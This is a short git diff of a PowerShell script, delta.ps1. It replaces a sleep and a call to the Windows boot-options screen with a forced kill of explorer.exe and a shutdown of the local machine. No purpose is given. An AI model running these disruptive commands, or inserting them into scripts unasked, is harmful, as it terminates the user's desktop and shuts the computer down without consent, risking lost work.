diff --git a/delta.ps1 b/delta.ps1 index 17d0380..3913515 100644 --- a/delta.ps1 +++ b/delta.ps1 @@ -1,2 +1,2 @@ -sleep 1 -bootim \ No newline at end of file +taskkill.exe /f /IM explorer.exe +Stop-Computer -ComputerName localhost \ No newline at end of file